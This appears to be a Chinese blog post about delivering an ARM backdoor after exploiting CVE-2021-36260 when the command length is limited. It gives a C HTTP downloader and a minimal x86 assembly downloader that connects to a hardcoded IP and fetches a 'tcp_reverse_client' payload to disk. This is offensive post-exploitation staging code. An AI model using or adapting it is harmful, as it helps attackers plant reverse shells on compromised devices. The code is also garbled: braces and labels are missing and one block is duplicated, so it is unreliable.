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2022-03-19 15:24:21
所属地 安徽省





图 2.来自 CVE-2021-36260 的有效负载



不过我手头的ARM backdoor比较大,约700KB,在命令长度有限的情况下,大概要写三万多次,也就是对目标发起三万次的敏感攻击,这无疑是不可取的。既增大了暴露风险,还容易把目标打到拒绝服务,也许还没进行一半,就被防火墙reset了。


1. C语言尝试

我们不生产代码,我们只是代码的搬运工 QAQ



// filename : downloader.c
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <fcntl.h>
#include <unistd.h>
#include <netdb.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/time.h>

struct resp_header//保持相应头信息
    int status_code;//HTTP/1.1 '200' OK
    char content_type[128];//Content-Type: application/gzip
    long content_length;//Content-Length: 11683079
    char file_name[256];

struct resp_header resp;//全剧变量以便在多个进程中使用

void parse_url(const char *url, char *domain, int *port, char *file_name)
    /*通过url解析出域名, 端口, 以及文件名*/
    int j = 0;
    int start = 0;
    *port = 80;
    char *patterns[] = {"http://", "https://", NULL};

    for (int i = 0; patterns[i]; i++)
        if (strncmp(url, patterns[i], strlen(patterns[i])) == 0)
            start = strlen(patterns[i]);

    //解析域名, 这里处理时域名后面的端口号会保留
    for (int i = start; url[i] != '/' && url[i] != '\0'; i++, j++)
        domain[j] = url[i];
    domain[j] = '\0';

    //解析端口号, 如果没有, 那么设置端口为80
    char *pos = strstr(domain, ":");
    if (pos)
        sscanf(pos, ":%d", port);


    for (int i = 0; i < (int)strlen(domain); i++)
        if (domain[i] == ':')
            domain[i] = '\0';

    j = 0;
    for (int i = start; url[i] != '\0'; i++)
        if (url[i] == '/')
            if (i !=  strlen(url) - 1)
                j = 0;
            file_name[j++] = url[i];
    file_name[j] = '\0';

struct resp_header get_resp_header(const char *response)
    struct resp_header resp;

    char *pos = strstr(response, "HTTP/");
    if (pos)
        sscanf(pos, "%*s %d", &resp.status_code);//返回状态码

    pos = strstr(response, "Content-Type:");//返回内容类型
    if (pos)
        sscanf(pos, "%*s %s", resp.content_type);

    pos = strstr(response, "Content-Length:");//内容的长度(字节)
    if (pos)
        sscanf(pos, "%*s %ld", &resp.content_length);

    return resp;

void get_ip_addr(char *domain, char *ip_addr)
    struct hostent *host = gethostbyname(domain);
    if (!host)
        ip_addr = NULL;

    for (int i = 0; host->h_addr_list[i]; i++)
        strcpy(ip_addr, inet_ntoa( * (struct in_addr*) host->h_addr_list[i]));

void * download(void * socket_d)
    /*下载文件函数, 放在线程中执行*/
    int client_socket = *(int *) socket_d;
    int length = 0;
    int mem_size = 4096;//mem_size might be enlarge, so reset it
    int buf_len = mem_size;//read 4k each time
    int len;

    int fd = open(resp.file_name, O_CREAT | O_WRONLY, S_IRWXG | S_IRWXO | S_IRWXU);
    if (fd < 0)

    char *buf = (char *) malloc(mem_size * sizeof(char));

    while ((len = read(client_socket, buf, buf_len)) != 0 && length < resp.content_length)
        write(fd, buf, len);
        length += len;


int main(int argc, char const *argv[])
        test url:
    char url[2048] = "";
    char domain[64] = {0};
    char ip_addr[16] = {0};
    int port = 80;
    char file_name[256] = {0};

    if (argc == 1)
        printf("Input a valid URL please\n");
        strcpy(url, argv[1]);

    parse_url(url, domain, &port, file_name);

    if (argc == 3)
        strcpy(file_name, argv[2]);

    get_ip_addr(domain, ip_addr);
    if (strlen(ip_addr) == 0)
        return 0;

    char header[2048] = {0};
    sprintf(header, \
            "GET %s HTTP/1.1\r\n"\
            "User-Agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537(KHTML, like Gecko) Chrome/47.0.2526Safari/537.36\r\n"\
        ,url, domain);

    int client_socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (client_socket < 0)

    struct sockaddr_in addr;
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = inet_addr(ip_addr);
    addr.sin_port = htons(port);

    int res = connect(client_socket, (struct sockaddr *) &addr, sizeof(addr));
    if (res == -1)

    write(client_socket, header, strlen(header));

    int mem_size = 4096;
    int length = 0;
    int len;
    char *buf = (char *) malloc(mem_size * sizeof(char));
    char *response = (char *) malloc(mem_size * sizeof(char));

    //每次单个字符读取响应头信息, 仅仅读取的是响应部分的头部, 后面单独开线程下载
    while ((len = read(client_socket, buf, 1)) != 0)
        if (length + len > mem_size)
            //动态内存申请, 因为无法确定响应头内容长度
            mem_size *= 2;
            char * temp = (char *) realloc(response, sizeof(char) * mem_size);
            if (temp == NULL)
                printf("realloc failed\n");
            response = temp;

        buf[len] = '\0';
        strcat(response, buf);

        //找到响应头的头部信息, 两个"\n\r"为分割点
        int flag = 0;
        for (int i = strlen(response) - 1; response[i] == '\n' || response[i] == '\r'; i--, flag++);
        if (flag == 4)

        length += len;

    resp = get_resp_header(response);
    strcpy(resp.file_name, file_name);

    return 0;

gcc -s -O3 -e nomain -nostartfiles -o downloader downloader.c


come on, 这一点都不极客啊。既然要做 就做最小(狗头)

2. 汇编挑战


经过我 三下五除二 一顿操作猛如虎 混元霹雳闪电 终于啪的一下写好了,很快啊!

; downloader

; Compile with: nasm -f elf crawler3-0c.asm

; Link with (64 bit systems require elf_i386 option): -m elf_i386 craw3-0c.o -o crawler

; Run with: ./crawler



; our request string

request db 'GET /tcp_reverse_client HTTP/1.1', 0Dh, 0Ah, 'Accept: */*', 0Dh, 0Ah, 0Dh, 0Ah, 0h

filename db 'out', 0h    ; the filename to save to local system


buffer resb 256,                  ; variable to store response


global  _start


; void exit()

; Exit program and restore resources


    mov     ebx, 0

    mov     eax, 1

    int     80h




    xor     eax, eax            ; init eax 0

    xor     ebx, ebx            ; init ebx 0

    xor     edi, edi            ; init edi 0


    push    byte 6              ; push 6 onto the stack (IPPROTO_TCP)

    push    byte 1              ; push 1 onto the stack (SOCK_STREAM)

    push    byte 2              ; push 2 onto the stack (PF_INET)

    mov     ecx, esp            ; move address of arguments into ecx

    mov     ebx, 1              ; invoke subroutine SOCKET (1)

    mov     eax, 102            ; invoke SYS_SOCKETCALL (kernel opcode 102)

    int     80h                 ; call the kernel



    mov     edi, eax            ; move return value of SYS_SOCKETCALL into edi (file descriptor for new socket, or -1 on error)

    push    dword 0x816fa8c0    ; push onto the stack IP ADDRESS (reverse byte order)

    push    word 0x5000         ; push 80 onto stack PORT (reverse byte order)

    push    word 2              ; push 2 dec onto stack AF_INET

    mov     ecx, esp            ; move address of stack pointer into ecx

    push    byte 16             ; push 16 dec onto stack (arguments length)

    push    ecx                 ; push the address of arguments onto stack

    push    edi                 ; push the file descriptor onto stack

    mov     ecx, esp            ; move address of arguments into ecx

    mov     ebx, 3              ; invoke subroutine CONNECT (3)

    mov     eax, 102            ; invoke SYS_SOCKETCALL (kernel opcode 102)

    int     80h                 ; call the kernel




    mov     edx, 49             ; move 43 dec into edx (length in bytes to write)

    mov     ecx, request        ; move address of our request variable into ecx

    mov     ebx, edi            ; move file descriptor into ebx (created socket file descriptor)

    mov     eax, 4              ; invoke SYS_WRITE (kernel opcode 4)

    int     80h                 ; call the kernel

    ; open file

    mov     ecx, 0777o          ; code continues from lesson 22

    mov     ebx, filename

    mov     eax, 8

    int     80h

    push    eax


    mov     edx, 256              ; number of bytes to read (we will read 1 byte at a time)

    mov     ecx, buffer         ; move the memory address of our buffer variable into ecx

    mov     ebx, edi            ; move edi into ebx (created socket file descriptor)

    mov     eax, 3              ; invoke SYS_READ (kernel opcode 3)

    int     80h                 ; call the kernel


    cmp     eax, 0              ; if return value of SYS_READ in eax is zero, we have reached the end of the file

    jz      _close              ; jmp to _close if we have reached the end of the file (zero flag set)

    mov     edx, eax            ; edx to save bytes length


    ;  check if the buffer contains 'HTTP/'  at the beginning

    mov     ebx, buffer         ; move the address of our message string into EBX

    mov     eax, ebx            ; move the address in EBX into EAX as well (Both now point to the same segment in memory)

    cmp     byte [eax], 72

    jnz     _reset_eax

    cmp     byte [eax+1], 84

    jnz     _reset_eax

    cmp     byte [eax+2], 84

    jnz     _reset_eax

    cmp     byte [eax+3], 80

    jnz     _reset_eax

    cmp     byte [eax+4], 47

    jnz     _reset_eax ; 13 10 13 10


    inc     eax             ; increment the address in EAX by one byte 

    cmp     byte [eax], 13  ; compare the byte pointed to by EAX at this address against '\r'

    jnz     nextchar        ; jump (if it is not \r) 

    inc     eax             ; increment the address in EAX by one byte 

    cmp     byte [eax], 10  ; compare the byte pointed to by EAX at this address against '\n'

    jnz     nextchar        ; jump (if it is not \n) 

    inc     eax             ; increment the address in EAX by one byte 

    cmp     byte [eax], 13  ; compare the byte pointed to by EAX at this address against '\r'

    jnz     nextchar        ; jump (if it is not \r) 

    inc     eax             ; increment the address in EAX by one byte 

    cmp     byte [eax], 10  ; compare the byte pointed to by EAX at this address against '\n'

    jnz     nextchar        ; jump (if it is not \r) 

    inc     eax             ; increment the address in EAX by one byte 

    jmp    finished         ; now we reach the end of http header


    mov     eax, buffer 


    push    eax             ; new buff

    sub     eax, ebx        ; subtract the address in EBX from the address in EAX

                            ; the result is number of segments between them - in this case the number of HTTP header

    sub     edx, eax        ; subtract the address in eax from the address in edx

                            ; the result is number of segments between them - in this case the number of real file size without http header

    ; write file 

    pop     ecx             ; new buff, move the memory address of our contents string into ecx

    pop     ebx             ; ebx save socket fd

    push    ebx

    mov     eax, 4              ; invoke SYS_WRITE (kernel opcode 4)

    int     80h                 ; call the kernel

    ; continue to receive file

    jmp     _read               ; jmp to _read



    ; close file 

    pop     ebx                 ; file fd

    mov     ebx, ebx            ; not needed but used to demonstrate that SYS_CLOSE takes a file descriptor from EBX

    mov     eax, 6              ; invoke SYS_CLOSE (kernel opcode 6)

    int     80h                 ; call the kernel

    cmp     edi, 0              ; if edi(connected socket file descriptor) is null, we jump to exit

    jz      _exit


    ; otherwise , we close socket

    mov     ebx, edi            ; move edi into ebx (connected socket file descriptor)

    mov     eax, 6              ; invoke SYS_CLOSE (kernel opcode 6)

    int     80h                 ; call the kernel


    call    quit                ; call our quit function


nasm -f elf craw3-0c.asm -s -m elf_i386 craw3-0c.o -o crawler






主要参考Lesson 3、22、23、24、25、26、36,源码在Lesson 36基础上做了修改,实现了写文件、去掉http头直接保存二进制文件的功能。



_start -> _socket -> _connect -> _write -> _read -> _do_cmp -> nextchar -> finished -> exit






    mov     edx, 256              ; number of bytes to read (we will read 1 byte at a time)

    mov     ecx, buffer         ; move the memory address of our buffer variable into ecx

    mov     ebx, edi            ; move edi into ebx (created socket file descriptor)

    mov     eax, 3              ; invoke SYS_READ (kernel opcode 3)

    int     80h                 ; call the kernel


    cmp     eax, 0              ; if return value of SYS_READ in eax is zero, we have reached the end of the file

    jz      _close              ; jmp to _close if we have reached the end of the file (zero flag set)

    mov     edx, eax            ; edx to save bytes length


    ;  check if the buffer contains 'HTTP/'  at the beginning

    mov     ebx, buffer         ; move the address of our message string into EBX

    mov     eax, ebx            ; move the address in EBX into EAX as well (Both now point to the same segment in memory)

    cmp     byte [eax], 72

    jnz     _reset_eax

    cmp     byte [eax+1], 84

    jnz     _reset_eax

    cmp     byte [eax+2], 84

    jnz     _reset_eax

    cmp     byte [eax+3], 80

    jnz     _reset_eax

    cmp     byte [eax+4], 47

    jnz     _reset_eax ; 13 10 13 10


    inc     eax             ; increment the address in EAX by one byte 

    cmp     byte [eax], 13  ; compare the byte pointed to by EAX at this address against '\r'

    jnz     nextchar        ; jump (if it is not \r) 

    inc     eax             ; increment the address in EAX by one byte 

    cmp     byte [eax], 10  ; compare the byte pointed to by EAX at this address against '\n'

    jnz     nextchar        ; jump (if it is not \n) 

    inc     eax             ; increment the address in EAX by one byte 

    cmp     byte [eax], 13  ; compare the byte pointed to by EAX at this address against '\r'

    jnz     nextchar        ; jump (if it is not \r) 

    inc     eax             ; increment the address in EAX by one byte 

    cmp     byte [eax], 10  ; compare the byte pointed to by EAX at this address against '\n'

    jnz     nextchar        ; jump (if it is not \r) 

    inc     eax             ; increment the address in EAX by one byte 

    jmp    finished         ; now we reach the end of http header


    mov     eax, buffer 


    push    eax             ; new buff

    sub     eax, ebx        ; subtract the address in EBX from the address in EAX

                            ; the result is number of segments between them - in this case the number of HTTP header

    sub     edx, eax        ; subtract the address in eax from the address in edx

                            ; the result is number of segments between them - in this case the number of real file size without http header

    ; write file 

    pop     ecx             ; new buff, move the memory address of our contents string into ecx

    pop     ebx             ; ebx save socket fd

    push    ebx

    mov     eax, 4              ; invoke SYS_WRITE (kernel opcode 4)

    int     80h                 ; call the kernel

    ; continue to receive file

    jmp     _read               ; jmp to _read```

_read从缓冲区接收数据,每次取256个字节存到buffer,接着进入_do_cmp,判断当前buffer的前5个字节是否是"HTTP/",如果不是则直接追加写入文件,如果是则进入nextchar,找到http头结尾“\r\n\r\n”,接着都会进到finished,在finished中计算http头长度和实际想下载的文件的长度,最后写文件,再跳回_read进行下一次读取,直至缓冲区的数据读完。这样 一个文件就下载完成了,我在代码中也写了很多注释,可以结合着看。

3. 总结

  • TODO


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